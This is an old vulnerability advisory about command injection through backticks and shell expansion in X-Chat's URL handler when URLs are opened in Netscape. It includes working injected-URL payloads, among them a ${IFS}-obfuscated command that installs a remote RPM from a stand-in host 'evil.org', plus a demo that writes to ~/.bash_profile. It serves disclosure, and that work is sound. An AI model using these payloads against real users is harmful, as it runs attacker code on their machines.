SecurityvulnsSECURITYVULNS:DOC:568XChat URL handler vulnerabilty
Email was sent to [email protected] (the author of xchat) and after over a week,
I have received no reply. So here it is… the advisory.
zen-parse - blinking since 1992 (or mebe earlier)
X X CC H H AA TTTTT
X X C C H H A A T
X C HHHH AAAA T
X X C C H H A A T
X X CC H H A A T
Hole: backticked commands embedded in URLs vulnerabilty.
- If you are lazy, read this part *
Just to show what i mean about the possible danger, start Netscape and enter
in xchat, (in a channel or query window) the following URL.
Right click on it, and select the Netscape (Existing) or Netscape (New Window)
option.
Wait until the URL loads.
In a shell on your machine type
tail -2 ~/.bash_profile
echo You've been hax0red
echo --zen
(oops… should've been You\'ve been hax0red, but u get the idea ;])
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?
For the non-lazy and the lazy who were impressed by the quick demo…
<advisory>
X-Chat has a feature which allows execution of code remotely
with the permissions of the user running it. (affects at least
versions <1.4.2, probably all versions.)
The hole is in the URL Handler section:
Netscape (Existing)
causes XChat to run the command
netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL
eg: http://homepages.ihug.co.nz/~Sneuro/
causes the command
netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page.
Netscape (Run New)
causes XChat to run the command
netscape %s
and so on.
-
The Hole *
Backticking and shell expansion. Imagine if someone types:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
with the (Existing) or (New Window) options and others that
use 'openURL(%s)' type commands to start the program, you get:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
count the 's and u will see that at the 2nd date they are closed,
and then reopened, so that date isn't escaped anymore… leaving it free to
run, which it does.
With the (Run New) type commands (that is command %s with no 's around
the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
which has the 1st date unescaped (no 's around it) and so it executes.
In real life though, its unlikely anyone would click on a URL like
http://`reboot`/'`reboot`'
though. Still, not all that useful, I hear you tell me. Well, URLs can get
pretty long. For example, a cgi-bin call to somethng can get quite long.
compare that to:
quick glance… nothing wrong with it.
well, u seem to have a limitation, in that putting spaces in doesn't
work, nor does redirection.
well, u can put spaces in.The $IFS variable is probably set.
And who needs redirection, when u can do this:
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
(For (Existing) or (New Window))
http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"
(for (Run New))
(not hidden in anyway, but it could be obfuscated like the earlier example.)
(Also only works if someone is running as root, (which is STUPID idea
anyway) but the 1st example should've shown you a method around this)
anyway… the possibilities are endless ;)
– zen-parse
</advisory>
ps:
greets to:
lamagra, omega, lockdown, grue, Mega, possem,
some other people i can't remember, the rest of #roothat,
and mebe even #social and umm… u, if I know u.
Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41